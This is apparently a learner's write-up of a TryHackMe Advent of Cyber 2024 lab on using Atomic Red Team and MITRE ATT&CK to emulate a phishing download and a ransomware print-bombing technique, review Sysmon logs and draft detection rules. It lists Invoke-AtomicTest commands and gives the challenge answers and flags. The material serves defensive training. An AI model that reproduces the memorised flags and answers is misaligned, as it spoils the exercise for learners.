TryhackMe

Advent of Cyber 2024 — Day 4: Atomic Red Team and MITRE ATT&CK Framework

Today’s challenge revolved around utilizing the Atomic Red Team framework to emulate adversarial techniques, analyzing system logs for Indicators of Compromise (IOCs), and creating detection rules to enhance threat detection capabilities.

Key Learning Objectives

1. Understanding Detection Gaps

• Detection gaps exist because adversaries evolve tactics and distinguishing malicious activities from legitimate ones is challenging.
• The goal is to detect attacks early in the kill chain or at any stage before goal execution.

2. Unified Cyber Kill Chain

• The kill chain outlines the standard stages of an attack (applicable to a malicious actor and a red teamer), guiding blue teams to ensure broad detection coverage.

3. MITRE ATT&CK Framework

• This is a widely-used reference for TTPs (Tactics, Techniques, and Procedures). https://attack.mitre.org/
• MITRE ATT&CK Navigator helps map out these TTPs for operational insights. https://mitre-attack.github.io/attack-navigator/

4. Atomic Red Team Framework

• Simplifies testing of detection gaps with emulated adversarial techniques mapped to MITRE ATT&CK.
• Automates or manually executes attack scenarios, leaving traces to analyze.

Practical Instance

1. Setup: Reviewed the test details using Invoke-AtomicTest T1566.001 -ShowDetails. Focused on the technique (T1566.001) involving a macro-enabled document simulating a phishing link.

2. Prerequisite Check: Verified dependencies with Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq.

3. Test Execution: Ran the test to simulate downloading the phishing attachment (PhishingAttachment.xlsm).

4. Event Analysis: Cleared Sysmon logs for clarity. And then monitored key events:

• Process Creation: Observed PowerShell command initiating the download.
• File Creation: Detected the creation of PhishingAttachment.xlsm.

5. IOC Collection: Identified indicators:

• Use of Invoke-WebRequest with specific URL and file details.
• Presence of the downloaded file (PhishingAttachment.xlsm).

6. Cleanup: Removed all test artifacts and restored the environment using Invoke-AtomicTest T1566.001 -TestNumbers 1 -cleanup.

Challenge

And the task assigned was to: identify the correct atomic test to run that will take advantage of a command and scripting interpreter, conduct the test, and extract valuable artefacts that would be used to craft a detection rule.

1. What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xslm artefact? THM{GlitchTestingForSpearphishing}

2. What ATT&CK technique ID would be our point of interest? T1059

3. What ATT&CK subtechnique ID focuses on the Windows Command Shell? T1059.003

4. What is the name of the Atomic Test to be simulated? Simulate BlackByte Ransomware Print Bombing

5. What is the name of the file used in the test? Wareville_Ransomware.txt

6. What is the flag found from this Atomic Test? THM{R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=}

• this had 3 phases: first was to run the specific Atomic Test T1059.003

• The Second phase was to save the pdf output on the folder as seen below.

• And upon navigating to the folder where the file was saved, here’s what we got.

This exercise reinforced the importance of emulating adversarial techniques to uncover detection gaps, analyze IOCs, and craft effective detection rules for strengthening blue team defenses.